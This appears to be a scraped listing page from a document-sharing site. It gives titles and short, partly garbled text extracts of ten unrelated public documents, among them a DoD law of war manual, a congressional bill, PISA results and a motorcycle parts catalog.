John Bel Edwards Rebekah E. Gee MD, MPH SECRETARY GOVERNOR State of Louisiana Louisiana Department of Health Office of Public Health Certified Water and Wastewater Operators 2018 - 2019 Hours Hours li...

More info »
me bpd eng

me bpd eng

2017–18 Estimates Parts I and II The Government Expenditure Plan and Main Estimates ESTIMATES ESTIMATES

More info »
untitled

untitled

G:\P\16\HR1\INTRO.XML ... (Original Signature of Member) TH 116 CONGRESS 1 ST S ESSION H. R. 1 To expand Americans’ access to the ballot box, reduce the influence of big money in politics, and strengt...

More info »
Department of Defense   Law of War Manual (June 2015)

Department of Defense Law of War Manual (June 2015)

D E A R T M E N T O F D E F E N S E P N A L O F W A R M A W U A L J U N E 2 0 1 5 O F F I C E O F G E N ER A L C O U N S E L D P A R T M E N T E O F D E F E N S E

More info »
Fourth National Report on Human Exposure to Environmental Chemicals Update

Fourth National Report on Human Exposure to Environmental Chemicals Update

201 8 Fourth National Report on Human Exposure to Environmental Chemicals U pdated Tables, March 2018 , Volume One

More info »
pisa 2012 results volume I

pisa 2012 results volume I

PISA 2012 Results: What Students Know and Can Do tICS, themA StuDent PeRfoRmAnCe In mA ReADIng AnD SCIenCe Volume I rogramme for ssessment A tudent S nternational I P

More info »
doj final opinion

doj final opinion

UNITED STAT ES DIS TRICT COURT IC F OR THE D ISTR T OF CO LU M BIA UNITED STAT F AMERICA, : ES O : : la in t if f, P 99 No. on cti l A vi Ci : 96 (GK) -24 : and : TOBACCO-F UND, : REE KIDS ACTION F : ...

More info »
NB18

NB18

Table of Contents National Board Pressure Relief Device Certificati ons NB-18 FOREWARD... 1 NATIONAL BOARD PRESSURE RELIEF DEVICE CERTIFICATION... 2 DETERMINATION OF CERTIFIED RELIEVING CAPACITIES... ...

More info »
At the Dawn of Belt and Road: China in the Developing World

At the Dawn of Belt and Road: China in the Developing World

At the Dawn of Belt and Road China in the Developing World Andrew Scobell, Bonny Lin, Howard J. Shatz, Michael Johnson, Larry Hanauer, Michael S. Chase, Astrid Stuth Cevallos, Ivan W. Rasmussen, Arthu...

More info »
catalog 2019

catalog 2019

2019 ® HARLEY-DAVIDSON GENUINE MOTOR PARTS & ACCESSORIES

More info »